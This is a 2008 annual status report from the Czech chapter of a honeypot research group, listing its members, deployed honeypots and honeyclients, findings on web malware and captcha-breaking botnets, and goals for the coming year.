Czech Chapter Status Report For 2008

 
 
ORGANIZATION
 
1. Changes in the structure of your organization.
 

  • We have one new member, his name is Jan Snajdr.

 
2. List current chapter members and their activities
 

  • David Vorel - Honeypots deployment, data analyst
  • Petr Hromadko - Honeypots deployment
  • Ales Hrabe - Honeypots deployment, webmaster
  • Jan Snajdr - New member - mainly data analyst

 
DEPLOYMENTS
 
1. List current technologies deployed.
 
Low interaction:
 

  • 11x Nepenthes allocated on 20 external IP
  • 5x Kojoney SSH honeypot
  • A lot of parsers for RFI attacks (about 150 domain)

 
High interaction:
 

  • 5x Honeyclient - each on own hw (with Vmware GSX) with external IP. All clients are configured to use one "master" proxy server, which can use another 15 upstream proxies for simple works and also for possiblity of backlog analyses.
  • 2x Sensor aka "HoneyForum" are PHPBB based forum used for tracking www spam bots (one based on 3th party domain, one on 2th party domain .info)
  • 1x Native linux server used also as sandbox for running specific perl/php/binary codes in high monitoring enviroment (grsec + L2 bridge with QoS and pcap monitor)

 
2. Activity timeline: Highlight attacks, compromises, and interesting information collected.
 

  • 02/08 - Botnet visualization
  • 09/08 - We deployed scope of Honeyclients - http://www.honeynet.cz/img/clienthoneypots-big.png
  • 10/08 - We focused on web malware, from this time our running sensors find aprox 20 sites hosting malware each day.

 
RESEARCH AND DEVELOPMENT
 
1. List any new tools, projects or ideas you are currently researching or developing.
 

  • We'd like deploy more web honeypots on different aplication (Drupal, Wordpress, SMF, YaBB, etc..) and we'd like also focus on this category (as it is actual trend in spreading malicious url around the world).
  • We'd like also deploy more Honeyclients sensors for dimension throughput in malicious URL testing (we are getting 100k URL/day but we can test 10k URL/day)

 
FINDINGS
 

1. Highlight any unique findings, attacks, tools, or methods.
 

  • Botnets based on HTTP breaking captcha in google/yahoo/live.

 
2. Any trends seen in the past year ?
 

  • More and more kinds of malicious sites hosting malware.

 
3. What are you using for data analysis?
 

  • Bunch of "well known" tools (from Tcpdump/Tshark/Ethereal, Chaosreader for pcaps.
  • Sandboxes - natives/virtual

 
 
PAPERS AND PRESENTATIONS
 

  • Botnet map based from our tracking database - http://www.csoonline.com/article/348317/What_a_Botnet_Looks_Like
  • Talk about Czech Chapter (In Czech language only. Simply past and future, main goals, etc..) - http://www.secit.sk/content/rozhovor-so-zakladatelom-honeynetcz

 
 
GOALS
 
1. Which of your goals did you meet for the past year ?
 

  • We started doing serious research on our data collected from HoneyForum.

 
2. Goals for the next year.
 

  • More workshops for public.
  • We'd like to have oficial status as non-profit organization this year.

 
 

Groups: